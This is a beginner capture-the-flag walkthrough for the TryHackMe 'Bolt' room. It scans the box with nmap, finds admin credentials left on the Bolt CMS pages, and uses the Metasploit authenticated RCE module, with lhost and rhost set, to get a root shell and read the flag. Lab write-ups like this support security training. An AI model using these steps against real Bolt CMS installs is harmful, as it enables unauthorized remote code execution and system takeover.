It is a CMS based machine having Remote Code Execution and its beginner-friendly box. Come let's Do This Together.
First things first, find your machine in Tryhackme named Bolt - A hero unleashed.
Connect to your Tryhackme VPN server using your configuration file (<username>.ovpn) and here is the reference command in case you need it.
Also, deploy your machine from task 1 on the room and get the IP address.
Take this <ip> to do some Nmap scan to find what ports are open there.
root@root:#nmap -A <ip>
OK, so three ports are open :
22-SSH(OpenSSH) | 80 (HTTP-Apache) | 8000 (HTTP-PHP 7.2.32-1)
As port 80 is there so I tried to open it into web browser <ip>:80
Ahhh.. nothing interesting just default page of Ubuntu Apache 2 server
Then as port 8000 is also having HTTP service so I tried port 8000 <ip>:8000
And got this Bolt CMS page.
Ahha! a blue screen but not of Death(BOD) instead of a hit.
OK, its time to wander around the site (Do it yourself).
Now during wandering, u will come across these two pages.
One have I note by the admin itself saying that here is the password in case if you need help and they forgot to remove it before production.
The second page contains the username for that. How lucky I am.
Meanwhile we got the two answers as well.
These two shows the user name and password.
We now have the Answer to the question, but where is the Question (login_page)?
so to find the question to my answers (sarcastic),
we need to google about the location of the default login page in bolt CMS. and I end up with this documentation manual on their official site.
According to the documentation, we'll get login page at www.yourdomain.com/bolt/login
so put in into our room address URL: <ip>:8000/bolt/login and get this login page.
Now more Information gathering:
OK, admin dashboard, lovely!
Wait! what's that in the bottom left corner. Hello Little version of Bolt CMS. (Bolt 3.7.1)
Now we need to exploit this. to do so we need an exploit, so search it on google database, or any other database for Bolt CMS 3.7.1 and we will get this exploit for the older version 3.7.0.
Here we go with the next answer to the task. Here is the exploit we are going to use. since it looks promising by name
Not lets fire our Metasploit its time to Attack:
search "bolt" to find the exploit
msf# <second exploit> is what we are going to use
msf6> use exploit/unix/webapp/bolt_authenticated_rce
now check the options by
Now set a few attributes of our exploit
>set lhost= <yourip> //use ifconfig command in Linux and type tun0 <yourip>. >set rhost= <room ip> >set username= bolt >set password= boltadmin123 >run
Wallah! we Got the shell
Booyah! we have root excess & now we need to crawl into the system to get the flag.
we are in-home/bolt/public/files | move to home
list the files, here is a file of the flag
don't wait just cat it
because bolt hates cat😹.
And here you go, you have exploited the machine, got a flag and ...